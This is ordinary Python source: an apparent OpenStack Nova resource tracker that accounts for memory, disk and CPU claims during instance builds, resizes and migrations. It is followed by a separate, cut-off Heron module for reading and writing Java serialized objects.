from nova.openstack.common import log as logging
resource_tracker_opts = [
cfg.IntOpt('reserved_host_disk_mb', default=0,
help='Amount of disk in MB to reserve for the host'),
cfg.IntOpt('reserved_host_memory_mb', default=512,
help='Amount of memory in MB to reserve for the host'),
cfg.StrOpt('compute_stats_class',
default='nova.compute.stats.Stats',
help='Class that will manage stats for the local compute host')
]
CONF = cfg.CONF
CONF.register_opts(resource_tracker_opts)
LOG = logging.getLogger(__name__)
COMPUTE_RESOURCE_SEMAPHORE = claims.COMPUTE_RESOURCE_SEMAPHORE
class ResourceTracker(object):
"""Compute helper class for keeping track of resource usage as instances
are built and destroyed.
"""
def __init__(self, host, driver, nodename):
self.host = host
self.driver = driver
self.nodename = nodename
self.compute_node = None
self.stats = importutils.import_object(CONF.compute_stats_class)
self.tracked_instances = {}
self.tracked_migrations = {}
self.conductor_api = conductor.API()
@lockutils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, 'nova-')
def instance_claim(self, context, instance_ref, limits=None):
"""Indicate that some resources are needed for an upcoming compute
instance build operation.
This should be called before the compute node is about to perform
an instance build operation that will consume additional resources.
:param context: security context
:param instance_ref: instance to reserve resources for
:param limits: Dict of oversubscription limits for memory, disk,
and CPUs.
:returns: A Claim ticket representing the reserved resources. It can
be used to revert the resource usage if an error occurs
during the instance build.
"""
if self.disabled:
# compute_driver doesn't support resource tracking, just
# set the 'host' and node fields and continue the build:
self._set_instance_host_and_node(context, instance_ref)
return claims.NopClaim()
# sanity checks:
if instance_ref['host']:
LOG.warning(_("Host field should not be set on the instance until "
"resources have been claimed."),
instance=instance_ref)
if instance_ref['node']:
LOG.warning(_("Node field should be not be set on the instance "
"until resources have been claimed."),
instance=instance_ref)
claim = claims.Claim(instance_ref, self)
if claim.test(self.compute_node, limits):
self._set_instance_host_and_node(context, instance_ref)
# Mark resources in-use and update stats
self._update_usage_from_instance(self.compute_node, instance_ref)
# persist changes to the compute node:
self._update(context, self.compute_node)
return claim
else:
raise exception.ComputeResourcesUnavailable()
@lockutils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, 'nova-')
def resize_claim(self, context, instance_ref, instance_type, limits=None):
"""Indicate that resources are needed for a resize operation to this
compute host.
:param context: security context
:param instance_ref: instance to reserve resources for
:param instance_type: new instance_type being resized to
:param limits: Dict of oversubscription limits for memory, disk,
and CPUs.
:returns: A Claim ticket representing the reserved resources. This
should be turned into finalize a resource claim or free
resources after the compute operation is finished.
"""
if self.disabled:
# compute_driver doesn't support resource tracking, just
# generate the migration record and continue the resize:
migration_ref = self._create_migration(context, instance_ref,
instance_type)
return claims.NopClaim(migration=migration_ref)
claim = claims.ResizeClaim(instance_ref, instance_type, self)
if claim.test(self.compute_node, limits):
migration_ref = self._create_migration(context, instance_ref,
instance_type)
claim.migration = migration_ref
# Mark the resources in-use for the resize landing on this
# compute host:
self._update_usage_from_migration(self.compute_node, migration_ref)
elevated = context.elevated()
self._update(elevated, self.compute_node)
return claim
else:
raise exception.ComputeResourcesUnavailable()
def _create_migration(self, context, instance, instance_type):
"""Create a migration record for the upcoming resize. This should
be done while the COMPUTE_RESOURCES_SEMAPHORE is held so the resource
claim will not be lost if the audit process starts.
"""
# TODO(russellb): no-db-compute: Send the old instance type
# info that is needed via rpc so db access isn't required
# here.
old_instance_type_id = instance['instance_type_id']
old_instance_type = instance_types.get_instance_type(
old_instance_type_id)
return db.migration_create(context.elevated(),
{'instance_uuid': instance['uuid'],
'source_compute': instance['host'],
'source_node': instance['node'],
'dest_compute': self.host,
'dest_node': self.nodename,
'dest_host': self.driver.get_host_ip_addr(),
'old_instance_type_id': old_instance_type['id'],
'new_instance_type_id': instance_type['id'],
'status': 'pre-migrating'})
def _set_instance_host_and_node(self, context, instance_ref):
"""Tag the instance as belonging to this host. This should be done
while the COMPUTE_RESOURCES_SEMPAHORE is held so the resource claim
will not be lost if the audit process starts.
"""
values = {'host': self.host, 'node': self.nodename,
'launched_on': self.host}
self.conductor_api.instance_update(context, instance_ref['uuid'],
**values)
instance_ref['host'] = self.host
instance_ref['launched_on'] = self.host
instance_ref['node'] = self.nodename
def abort_instance_claim(self, instance):
"""Remove usage from the given instance"""
# flag the instance as deleted to revert the resource usage
# and associated stats:
instance['vm_state'] = vm_states.DELETED
self._update_usage_from_instance(self.compute_node, instance)
ctxt = context.get_admin_context()
self._update(ctxt, self.compute_node)
def abort_resize_claim(self, instance_uuid, instance_type):
"""Remove usage for an incoming migration"""
if instance_uuid in self.tracked_migrations:
migration, itype = self.tracked_migrations.pop(instance_uuid)
if instance_type['id'] == migration['new_instance_type_id']:
self.stats.update_stats_for_migration(itype, sign=-1)
self._update_usage(self.compute_node, itype, sign=-1)
ctxt = context.get_admin_context()
self._update(ctxt, self.compute_node)
@lockutils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, 'nova-')
def update_usage(self, context, instance):
"""Update the resource usage and stats after a change in an
instance
"""
if self.disabled:
return
uuid = instance['uuid']
# don't update usage for this instance unless it submitted a resource
# claim first:
if uuid in self.tracked_instances:
self._update_usage_from_instance(self.compute_node, instance)
self._update(context.elevated(), self.compute_node)
@property
def disabled(self):
return self.compute_node is None
@lockutils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, 'nova-')
def update_available_resource(self, context):
"""Override in-memory calculations of compute node resource usage based
on data audited from the hypervisor layer.
Add in resource claims in progress to account for operations that have
declared a need for resources, but not necessarily retrieved them from
the hypervisor layer yet.
"""
LOG.audit(_("Auditing locally available compute resources"))
resources = self.driver.get_available_resource(self.nodename)
if not resources:
# The virt driver does not support this function
LOG.audit(_("Virt driver does not support "
"'get_available_resource' Compute tracking is disabled."))
self.compute_node = None
return
self._verify_resources(resources)
self._report_hypervisor_resource_view(resources)
# Grab all instances assigned to this node:
instances = db.instance_get_all_by_host_and_node(context, self.host,
self.nodename)
# Now calculate usage based on instance utilization:
self._update_usage_from_instances(resources, instances)
# Grab all in-progress migrations:
migrations = db.migration_get_in_progress_by_host_and_node(context,
self.host, self.nodename)
self._update_usage_from_migrations(resources, migrations)
# Detect and account for orphaned instances that may exist on the
# hypervisor, but are not in the DB:
orphans = self._find_orphaned_instances()
self._update_usage_from_orphans(resources, orphans)
self._report_final_resource_view(resources)
self._sync_compute_node(context, resources)
def _sync_compute_node(self, context, resources):
"""Create or update the compute node DB record"""
if not self.compute_node:
# we need a copy of the ComputeNode record:
service = self._get_service(context)
if not service:
# no service record, disable resource
return
compute_node_refs = service['compute_node']
if compute_node_refs:
for cn in compute_node_refs:
if cn.get('hypervisor_hostname') == self.nodename:
self.compute_node = cn
break
if not self.compute_node:
# Need to create the ComputeNode record:
resources['service_id'] = service['id']
self._create(context, resources)
LOG.info(_('Compute_service record created for %s ') % self.host)
else:
# just update the record:
self._update(context, resources, prune_stats=True)
LOG.info(_('Compute_service record updated for %s ') % self.host)
def _create(self, context, values):
"""Create the compute node in the DB"""
# initialize load stats from existing instances:
compute_node = db.compute_node_create(context, values)
self.compute_node = dict(compute_node)
def _get_service(self, context):
try:
return db.service_get_all_compute_by_host(context,
self.host)[0]
except exception.NotFound:
LOG.warn(_("No service record for host %s"), self.host)
def _report_hypervisor_resource_view(self, resources):
"""Log the hypervisor's view of free memory in and free disk.
This is just a snapshot of resource usage recorded by the
virt driver.
"""
free_ram_mb = resources['memory_mb'] - resources['memory_mb_used']
free_disk_gb = resources['local_gb'] - resources['local_gb_used']
LOG.debug(_("Hypervisor: free ram (MB): %s") % free_ram_mb)
LOG.debug(_("Hypervisor: free disk (GB): %s") % free_disk_gb)
vcpus = resources['vcpus']
if vcpus:
free_vcpus = vcpus - resources['vcpus_used']
LOG.debug(_("Hypervisor: free VCPUs: %s") % free_vcpus)
else:
LOG.debug(_("Hypervisor: VCPU information unavailable"))
def _report_final_resource_view(self, resources):
"""Report final calculate of free memory and free disk including
instance calculations and in-progress resource claims. These
values will be exposed via the compute node table to the scheduler.
"""
LOG.audit(_("Free ram (MB): %s") % resources['free_ram_mb'])
LOG.audit(_("Free disk (GB): %s") % resources['free_disk_gb'])
vcpus = resources['vcpus']
if vcpus:
free_vcpus = vcpus - resources['vcpus_used']
LOG.audit(_("Free VCPUS: %s") % free_vcpus)
else:
LOG.audit(_("Free VCPU information unavailable"))
def _update(self, context, values, prune_stats=False):
"""Persist the compute node updates to the DB"""
compute_node = db.compute_node_update(context,
self.compute_node['id'], values, prune_stats)
self.compute_node = dict(compute_node)
def confirm_resize(self, context, migration, status='confirmed'):
"""Cleanup usage for a confirmed resize"""
elevated = context.elevated()
db.migration_update(elevated, migration['id'],
{'status': status})
self.update_available_resource(elevated)
def revert_resize(self, context, migration, status='reverted'):
"""Cleanup usage for a reverted resize"""
self.confirm_resize(context, migration, status)
def _update_usage(self, resources, usage, sign=1):
resources['memory_mb_used'] += sign * usage['memory_mb']
resources['local_gb_used'] += sign * usage.get('root_gb', 0)
resources['local_gb_used'] += sign * usage.get('ephemeral_gb', 0)
# free ram and disk may be negative, depending on policy:
resources['free_ram_mb'] = (resources['memory_mb'] -
resources['memory_mb_used'])
resources['free_disk_gb'] = (resources['local_gb'] -
resources['local_gb_used'])
resources['running_vms'] = self.stats.num_instances
resources['vcpus_used'] = self.stats.num_vcpus_used
def _update_usage_from_migration(self, resources, migration):
"""Update usage for a single migration. The record may
represent an incoming or outbound migration.
"""
uuid = migration['instance_uuid']
LOG.audit(_("Updating from migration %s") % uuid)
incoming = (migration['dest_compute'] == self.host and
migration['dest_node'] == self.nodename)
outbound = (migration['source_compute'] == self.host and
migration['source_node'] == self.nodename)
same_node = (incoming and outbound)
instance = self.tracked_instances.get(uuid, None)
itype = None
if same_node:
# same node resize. record usage for whichever instance type the
# instance is *not* in:
if (instance['instance_type_id'] ==
migration['old_instance_type_id']):
itype = migration['new_instance_type_id']
else:
# instance record already has new flavor, hold space for a
# possible revert to the old instance type:
itype = migration['old_instance_type_id']
elif incoming and not instance:
# instance has not yet migrated here:
itype = migration['new_instance_type_id']
elif outbound and not instance:
# instance migrated, but record usage for a possible revert:
itype = migration['old_instance_type_id']
if itype:
instance_type = instance_types.get_instance_type(itype)
self.stats.update_stats_for_migration(instance_type)
self._update_usage(resources, instance_type)
resources['stats'] = self.stats
self.tracked_migrations[uuid] = (migration, instance_type)
def _update_usage_from_migrations(self, resources, migrations):
self.tracked_migrations.clear()
filtered = {}
# do some defensive filtering against bad migrations records in the
# database:
for migration in migrations:
instance = migration['instance']
if not instance:
# migration referencing deleted instance
continue
uuid = instance['uuid']
# skip migration if instance isn't in a resize state:
if not self._instance_in_resize_state(instance):
LOG.warn(_("Instance not resizing, skipping migration."),
instance_uuid=uuid)
continue
# filter to most recently updated migration for each instance:
m = filtered.get(uuid, None)
if not m or migration['updated_at'] >= m['updated_at']:
filtered[uuid] = migration
for migration in filtered.values():
self._update_usage_from_migration(resources, migration)
def _update_usage_from_instance(self, resources, instance):
"""Update usage for a single instance."""
uuid = instance['uuid']
is_new_instance = uuid not in self.tracked_instances
is_deleted_instance = instance['vm_state'] == vm_states.DELETED
if is_new_instance:
self.tracked_instances[uuid] = jsonutils.to_primitive(instance)
sign = 1
if is_deleted_instance:
self.tracked_instances.pop(uuid)
sign = -1
self.stats.update_stats_for_instance(instance)
# if it's a new or deleted instance:
if is_new_instance or is_deleted_instance:
# new instance, update compute node resource usage:
self._update_usage(resources, instance, sign=sign)
resources['current_workload'] = self.stats.calculate_workload()
resources['stats'] = self.stats
def _update_usage_from_instances(self, resources, instances):
"""Calculate resource usage based on instance utilization. This is
different than the hypervisor's view as it will account for all
instances assigned to the local compute host, even if they are not
currently powered on.
"""
self.tracked_instances.clear()
# purge old stats
self.stats.clear()
# set some intiial values, reserve room for host/hypervisor:
resources['local_gb_used'] = CONF.reserved_host_disk_mb / 1024
resources['memory_mb_used'] = CONF.reserved_host_memory_mb
resources['vcpus_used'] = 0
resources['free_ram_mb'] = (resources['memory_mb'] -
resources['memory_mb_used'])
resources['free_disk_gb'] = (resources['local_gb'] -
resources['local_gb_used'])
resources['current_workload'] = 0
resources['running_vms'] = 0
for instance in instances:
if instance['vm_state'] == vm_states.DELETED:
continue
else:
self._update_usage_from_instance(resources, instance)
def _find_orphaned_instances(self):
"""Given the set of instances and migrations already account for
by resource tracker, sanity check the hypervisor to determine
if there are any "orphaned" instances left hanging around.
Orphans could be consuming memory and should be accounted for in
usage calculations to guard against potential out of memory
errors.
"""
uuids1 = frozenset(self.tracked_instances.keys())
uuids2 = frozenset(self.tracked_migrations.keys())
uuids = uuids1 | uuids2
usage = self.driver.get_per_instance_usage()
vuuids = frozenset(usage.keys())
orphan_uuids = vuuids - uuids
orphans = [usage[uuid] for uuid in orphan_uuids]
return orphans
def _update_usage_from_orphans(self, resources, orphans):
"""Include orphaned instances in usage."""
for orphan in orphans:
uuid = orphan['uuid']
memory_mb = orphan['memory_mb']
LOG.warn(_("Detected running orphan instance: %(uuid)s (consuming "
"%(memory_mb)s MB memory") % locals())
# just record memory usage for the orphan
usage = {'memory_mb': orphan['memory_mb']}
self._update_usage(resources, usage)
def _verify_resources(self, resources):
resource_keys = ["vcpus", "memory_mb", "local_gb", "cpu_info",
"vcpus_used", "memory_mb_used", "local_gb_used"]
missing_keys = [k for k in resource_keys if k not in resources]
if missing_keys:
reason = _("Missing keys: %s") % missing_keys
raise exception.InvalidInput(reason=reason)
def _instance_in_resize_state(self, instance):
vm = instance['vm_state']
task = instance['task_state']
if vm == vm_states.RESIZED:
return True
if (vm == vm_states.ACTIVE and task in [task_states.RESIZE_PREP,
task_states.RESIZE_MIGRATING, task_states.RESIZE_MIGRATED,
task_states.RESIZE_FINISH]):
return True
return False
|
|
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Provides functions for reading and writing (writing is WIP currently) Java objects
serialized or will be deserialized by ObjectOutputStream. This form of object
representation is a standard data interchange format in Java world.
javaobj module exposes an API familiar to users of the standard
library marshal, pickle and json modules.
See: http://download.oracle.com/javase/6/docs/platform/serialization/spec/protocol.html
"""
import io
import struct
from heron.common.src.python.utils.log import Log
def log_debug(message, ident=0):
"""log debugging info"""
Log.debug(" " * (ident * 2) + str(message))
def log_error(message, ident=0):
"""log error info"""
Log.error(" " * (ident * 2) + str(message))
__version__ = "$Revision: 20 $"
def load(file_object):
"""
Deserializes Java primitive data and objects serialized by ObjectOutputStream
from a file-like object.
"""
marshaller = JavaObjectUnmarshaller(file_object)
marshaller.add_transformer(DefaultObjectTransformer())
return marshaller.readObject()
# pylint: disable=undefined-variable
def loads(value: bytes):
"""
Deserializes Java objects and primitive data serialized by ObjectOutputStream
from a string.
"""
f = io.BytesIO(value)
marshaller = JavaObjectUnmarshaller(f)
marshaller.add_transformer(DefaultObjectTransformer())
return marshaller.readObject()
def dumps(obj):
"""
Serializes Java primitive data and objects unmarshaled by load(s) before into string.
"""
marshaller = JavaObjectMarshaller()
return marshaller.dump(obj)
_java_primitives = set([
"java.lang.Double",
"java.lang.Float",
"java.lang.Integer",
"java.lang.Long"])
class JavaClass:
"""Java class representation"""
def __init__(self):
self.name = None
self.serialVersionUID = None
self.flags = None
self.fields_names = []
self.fields_types = []
self.superclass = None
def __str__(self):
return self.__repr__()
def __repr__(self):
return "[%s:0x%X]" % (self.name, self.serialVersionUID)
class JavaObject:
"""Java object representation"""
def __init__(self):
self.classdesc = None
self.annotations = []
def get_class(self):
"""get class"""
return self.classdesc
def __str__(self):
"""get reprensentation in string"""
return self.__repr__()
def __repr__(self):
"""get reprensentation"""
name = "UNKNOWN"
if self.classdesc:
name = self.classdesc.name
return "<javaobj:%s>" % name
def classname(self):
name = "UNKNOWN"
if self.classdesc:
name = self.classdesc.name
return name
def is_primitive(self):
return self.classname() in _java_primitives
def copy(self, new_object):
"""copy an object"""
new_object.classdesc = self.classdesc
for name in self.classdesc.fields_names:
new_object.__setattr__(name, getattr(self, name))
class JavaObjectConstants:
"""class about Java object constants"""
STREAM_MAGIC = 0xaced
STREAM_VERSION = 0x05
TC_NULL = 0x70
TC_REFERENCE = 0x71
TC_CLASSDESC = 0x72
TC_OBJECT = 0x73
TC_STRING = 0x74
TC_ARRAY = 0x75
TC_CLASS = 0x76
TC_BLOCKDATA = 0x77
TC_ENDBLOCKDATA = 0x78
TC_RESET = 0x79
TC_BLOCKDATALONG = 0x7A
TC_EXCEPTION = 0x7B
TC_LONGSTRING = 0x7C
TC_PROXYCLASSDESC = 0x7D
TC_ENUM = 0x7E
TC_MAX = 0x7E
# classDescFlags
SC_WRITE_METHOD = 0x01 # if SC_SERIALIZABLE
SC_BLOCK_DATA = 0x08 # if SC_EXTERNALIZABLE
SC_SERIALIZABLE = 0x02
SC_EXTERNALIZABLE = 0x04
SC_ENUM = 0x10
# type definition chars (typecode)
TYPE_BYTE = 'B' # 0x42
TYPE_CHAR = 'C'
TYPE_DOUBLE = 'D' # 0x44
TYPE_FLOAT = 'F' # 0x46
TYPE_INTEGER = 'I' # 0x49
TYPE_LONG = 'J' # 0x4A
TYPE_SHORT = 'S' # 0x53
TYPE_BOOLEAN = 'Z' # 0x5A
TYPE_OBJECT = 'L' # 0x4C
TYPE_ARRAY = '[' # 0x5B
# list of supported typecodes listed above
TYPECODES_LIST = [
# primitive types
TYPE_BYTE,
TYPE_CHAR,
TYPE_DOUBLE,
TYPE_FLOAT,
TYPE_INTEGER,
TYPE_LONG,
TYPE_SHORT,
TYPE_BOOLEAN,
# object types
TYPE_OBJECT,
TYPE_ARRAY]
BASE_REFERENCE_IDX = 0x7E0000
# pylint: disable=missing-docstring
class JavaObjectUnmarshaller(JavaObjectConstants):
"""Java object unmarshaller"""
def __init__(self, stream=None):
self.opmap = {
self.TC_NULL: self.do_null,
self.TC_CLASSDESC: self.do_classdesc,
self.TC_OBJECT: self.do_object,
self.TC_STRING: self.do_string,
self.TC_ARRAY: self.do_array,
self.TC_CLASS: self.do_class,
self.TC_BLOCKDATA: self.do_blockdata,
self.TC_REFERENCE: self.do_reference,
self.TC_ENUM: self.do_enum,
self.TC_ENDBLOCKDATA: self.do_null, # note that we are reusing of do_null
}
self.current_object = None
self.reference_counter = 0
self.references = []
self.object_stream = stream
self._readStreamHeader()
self.object_transformers = []
def readObject(self):
"""read object"""
try:
_, res = self._read_and_exec_opcode(ident=0)
position_bak = self.object_stream.tell()
the_rest = self.object_stream.read()
if the_rest:
log_error("Warning!!!!: Stream still has %s bytes left.\
Enable debug mode of logging to see the hexdump." % len(the_rest))
log_debug(self._create_hexdump(the_rest))
else:
log_debug("Java Object unmarshalled succesfully!")
self.object_stream.seek(position_bak)
return res
except Exception:
self._oops_dump_state()
raise
def add_transformer(self, transformer):
"""add to object transformer"""
self.object_transformers.append(transformer)
def _readStreamHeader(self):
(magic, version) = self._readStruct(">HH")
if magic != self.STREAM_MAGIC or version != self.STREAM_VERSION:
raise IOError("The stream is not java serialized object.\
Invalid stream header: %04X%04X" % (magic, version))
def _read_and_exec_opcode(self, ident=0, expect=None):
(opid, ) = self._readStruct(">B")
log_debug("OpCode: 0x%X" % opid, ident)
if expect and opid not in expect:
raise IOError("Unexpected opcode 0x%X" % opid)
handler = self.opmap.get(opid)
if not handler:
raise RuntimeError("Unknown OpCode in the stream: 0x%x" % opid)
return (opid, handler(ident=ident))
def _readStruct(self, unpack):
length = struct.calcsize(unpack)
ba = self.object_stream.read(length)
if len(ba) != length:
raise RuntimeError("Stream has been ended unexpectedly while unmarshaling.")
return struct.unpack(unpack, ba)
def _readString(self):
(length, ) = self._readStruct(">H")
ba = self.object_stream.read(length)
return ba
def do_classdesc(self, parent=None, ident=0):
"""do_classdesc"""
# TC_CLASSDESC className serialVersionUID newHandle classDescInfo
# classDescInfo:
# classDescFlags fields classAnnotation superClassDesc
# classDescFlags:
# (byte) // Defined in Terminal Symbols and Constants
# fields:
# (short)<count> fieldDesc[count]
# fieldDesc:
# primitiveDesc
# objectDesc
# primitiveDesc:
# prim_typecode fieldName
# objectDesc:
# obj_typecode fieldName className1
clazz = JavaClass()
log_debug("[classdesc]", ident)
ba = self._readString()
clazz.name = ba
log_debug("Class name: %s" % ba, ident)
(serialVersionUID, newHandle, classDescFlags) = self._readStruct(">LLB")
clazz.serialVersionUID = serialVersionUID
clazz.flags = classDescFlags
self._add_reference(clazz)
log_debug("Serial: 0x%X newHandle: 0x%X.\
classDescFlags: 0x%X" % (serialVersionUID, newHandle, classDescFlags), ident)
(length, ) = self._readStruct(">H")
log_debug("Fields num: 0x%X" % length, ident)
clazz.fields_names = []
clazz.fields_types = []
for _ in range(length):
(typecode, ) = self._readStruct(">B")
field_name = self._readString()
field_type = None
field_type = self._convert_char_to_type(typecode)
if field_type == self.TYPE_ARRAY:
_, field_type = self._read_and_exec_opcode(
ident=ident+1, expect=[self.TC_STRING, self.TC_REFERENCE])
assert isinstance(field_type, str)
# if field_type is not None:
# field_type = "array of " + field_type
# else:
# field_type = "array of None"
elif field_type == self.TYPE_OBJECT:
_, field_type = self._read_and_exec_opcode(
ident=ident+1, expect=[self.TC_STRING, self.TC_REFERENCE])
assert isinstance(field_type, str)
log_debug("FieldName: 0x%X" % typecode + " " + str(field_name) + " " + str(field_type), ident)
assert field_name is not None
assert field_type is not None
clazz.fields_names.append(field_name)
clazz.fields_types.append(field_type)
# pylint: disable=protected-access
if parent:
parent.__fields = clazz.fields_names
parent.__types = clazz.fields_types
# classAnnotation
(opid, ) = self._readStruct(">B")
log_debug("OpCode: 0x%X" % opid, ident)
if opid != self.TC_ENDBLOCKDATA:
raise NotImplementedError("classAnnotation isn't implemented yet")
# superClassDesc
_, superclassdesc = self._read_and_exec_opcode(
ident=ident+1, expect=[self.TC_CLASSDESC, self.TC_NULL, self.TC_REFERENCE])
log_debug(str(superclassdesc), ident)
clazz.superclass = superclassdesc
return clazz
# pylint: disable=unused-argument
def do_blockdata(self, parent=None, ident=0):
# TC_BLOCKDATA (unsigned byte)<size> (byte)[size]
log_debug("[blockdata]", ident)
(length, ) = self._readStruct(">B")
ba = self.object_stream.read(length)
return ba
def do_class(self, parent=None, ident=0):
# TC_CLASS classDesc newHandle
log_debug("[class]", ident)
_, classdesc = self._read_and_exec_opcode(
ident=ident+1, expect=[self.TC_CLASSDESC, self.TC_PROXYCLASSDESC,
self.TC_NULL, self.TC_REFERENCE])
log_debug("Classdesc: %s" % classdesc, ident)
self._add_reference(classdesc)
return classdesc
def do_object(self, parent=None, ident=0):
# TC_OBJECT classDesc newHandle classdata[] // data for each class
java_object = JavaObject()
log_debug("[object]", ident)
log_debug("java_object.annotations just after instantination: " +
str(java_object.annotations), ident)
opcode, classdesc = self._read_and_exec_opcode(
ident=ident+1, expect=[self.TC_CLASSDESC, self.TC_PROXYCLASSDESC,
self.TC_NULL, self.TC_REFERENCE])
# self.TC_REFERENCE hasn't shown in spec, but actually is here
self._add_reference(java_object)
# classdata[]
# Store classdesc of this object
java_object.classdesc = classdesc
if classdesc.flags & self.SC_EXTERNALIZABLE and not classdesc.flags & self.SC_BLOCK_DATA:
raise NotImplementedError("externalContents isn't implemented yet")
if classdesc.flags & self.SC_SERIALIZABLE:
# create megalist
tempclass = classdesc
megalist = []
megatypes = []
while tempclass:
log_debug(">>> " + str(tempclass.fields_names) + " " + str(tempclass), ident)
log_debug(">>> " + str(tempclass.fields_types), ident)
fieldscopy = tempclass.fields_names[:]
fieldscopy.extend(megalist)
megalist = fieldscopy
fieldscopy = tempclass.fields_types[:]
fieldscopy.extend(megatypes)
megatypes = fieldscopy
tempclass = tempclass.superclass
log_debug("Values count: %s" % str(len(megalist)), ident)
log_debug("Prepared list of values: %s" % str(megalist), ident)
log_debug("Prepared list of types: %s" % str(megatypes), ident)
for field_name, field_type in zip(megalist, megatypes):
res = self._read_value(field_type, ident, name=field_name)
java_object.__setattr__(field_name, res)
if classdesc.flags & self.SC_SERIALIZABLE and classdesc.flags & \
self.SC_WRITE_METHOD or classdesc.flags & self.SC_EXTERNALIZABLE \
and classdesc.flags & self.SC_BLOCK_DATA:
# objectAnnotation
log_debug("java_object.annotations before: " + str(java_object.annotations), ident)
while opcode != self.TC_ENDBLOCKDATA:
opcode, obj = self._read_and_exec_opcode(ident=ident+1)
if opcode != self.TC_ENDBLOCKDATA:
java_object.annotations.append(obj)
log_debug("objectAnnotation value: " + str(obj), ident)
log_debug("java_object.annotations after: " + str(java_object.annotations), ident)
# Transform object
for transformer in self.object_transformers:
tmp_object = transformer.transform(java_object)
if tmp_object != java_object:
java_object = tmp_object
break
log_debug(">>> java_object: " + str(java_object), ident)
return java_object
def do_string(self, parent=None, ident=0):
log_debug("[string]", ident)
ba = self._readString()
self._add_reference(str(ba))
return str(ba)
def do_array(self, parent=None, ident=0):
# TC_ARRAY classDesc newHandle (int)<size> values[size]
log_debug("[array]", ident)
_, classdesc = self._read_and_exec_opcode(
ident=ident+1, expect=[self.TC_CLASSDESC,
self.TC_PROXYCLASSDESC, self.TC_NULL, self.TC_REFERENCE])
array = []
self._add_reference(array)
(size, ) = self._readStruct(">i")
log_debug("size: " + str(size), ident)
type_char = classdesc.name[0]
assert type_char == self.TYPE_ARRAY
type_char = classdesc.name[1]
if type_char in (self.TYPE_OBJECT, self.TYPE_ARRAY):
for _ in range(size):
_, res = self._read_and_exec_opcode(ident=ident+1)
log_debug("Object value: %s" % str(res), ident)
array.append(res)
else:
for _ in range(size):
res = self._read_value(type_char, ident)
log_debug("Native value: %s" % str(res), ident)
array.append(res)
return array
def do_reference(self, parent=None, ident=0):
(handle, ) = self._readStruct(">L")
log_debug("## Reference handle: 0x%x" % (handle), ident)
return self.references[handle - self.BASE_REFERENCE_IDX]
# pylint: disable=no-self-use
def do_null(self, parent=None, ident=0):
return None
def do_enum(self, parent=None, ident=0):
# TC_ENUM classDesc newHandle enumConstantName
enum = JavaObject()
_ = self._read_and_exec_opcode(
ident=ident+1, expect=[self.TC_CLASSDESC,
self.TC_PROXYCLASSDESC, self.TC_NULL, self.TC_REFERENCE])
self._add_reference(enum)
_, enumConstantName = self._read_and_exec_opcode(
ident=ident+1, expect=[self.TC_STRING, self.TC_REFERENCE])
return enumConstantName
def _create_hexdump(self, src, length=16):
FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or '.' for x in range(256)])
result = []
for i in range(0, len(src), length):
s = src[i:i+length]
hexa = ' '.join(["%02X"%ord(x) for x in s])
printable = s.translate(FILTER)
result.append("%04X %-*s %s\n" % (i, length*3, hexa, printable))
return ''.join(result)
def _read_value(self, field_type, ident, name=""):
if len(field_type) > 1:
field_type = field_type[0] # We don't need details for arrays and objects
if field_type == self.TYPE_BOOLEAN:
(val, ) = self._readStruct(">B")
res = bool(val)
elif field_type == self.TYPE_BYTE:
(res, ) = self._readStruct(">b")
elif field_type == self.TYPE_SHORT:
(res, ) = self._readStruct(">h")
elif field_type == self.TYPE_INTEGER:
(res, ) = self._readStruct(">i")
elif field_type == self.TYPE_LONG:
(res, ) = self._readStruct(">q")
elif field_type == self.TYPE_FLOAT:
(res, ) = self._readStruct(">f")
elif field_type == self.TYPE_DOUBLE:
(res, ) = self._readStruct(">d")
elif field_type in (self.TYPE_OBJECT, self.TYPE_ARRAY):
_, res = self._read_and_exec_opcode(ident=ident+1)
else:
raise RuntimeError("Unknown typecode: %s" % field_type)
log_debug("* %s %s: " % (field_type, name) + str(res), ident)
return res
def _convert_char_to_type(self, type_char):
typecode = type_char
if isinstance(type_char, int):
typecode = chr(type_char)
if typecode in self.TYPECODES_LIST:
return typecode
raise RuntimeError("Typecode %s (%s) isn't supported." % (type_char, typecode))
def _add_reference(self, obj):
self.references.append(obj)
def _oops_dump_state(self):
log_error("==Oops state dump" + "=" * (30 - 17))
log_error("References: %s" % str(self.references))
log_error("Stream seeking back at -16 byte (2nd line is an actual position!):")
self.object_stream.seek(-16, mode=1)
the_rest = self.object_stream.read()
if the_rest:
log_error("Warning!!!!: Stream still has %s bytes left." % len(the_rest))
log_error(self._create_hexdump(the_rest))
log_error("=" * 30)
class JavaObjectMarshaller(JavaObjectConstants):
def __init__(self, stream=None):
self.object_stream = stream
# pylint: disable=attribute-defined-outside-init
def dump(self, obj):
self.object_obj = obj
self.object_stream = io.BytesIO()
self._writeStreamHeader()
self.writeObject(obj)
return self.object_stream.getvalue()
def _writeStreamHeader(self):
self._writeStruct(">HH", 4, (self.STREAM_MAGIC, self.STREAM_VERSION))
def writeObject(self, obj):
log_debug("Writing object of type " + str(type(obj)))
if isinstance(obj, JavaObject):
self.write_object(obj)
elif isinstance(obj, str):
self.write_blockdata(obj)
else:
raise RuntimeError("Object serialization of type %s is not supported." % str(type(obj)))
def _writeStruct(self, unpack, _, args):
ba = struct.pack(unpack, *args)
self.object_stream.write(ba)
def _writeString(self, string):
l = len(string)
self._writeStruct(">H", 2, (l, ))
self.object_stream.write(string)
# pylint: disable=unused-argument
def write_blockdata(self, obj, parent=None):
# TC_BLOCKDATA (unsigned byte)<size> (byte)[size]
self._writeStruct(">B", 1, (self.TC_BLOCKDATA, ))
if isinstance(obj, str):
self._writeStruct(">B", 1, (len(obj), ))
self.object_stream.write(obj)
def write_object(self, obj, parent=None):
self._writeStruct(">B", 1, (self.TC_OBJECT, ))
self._writeStruct(">B", 1, (self.TC_CLASSDESC, ))
class DefaultObjectTransformer:
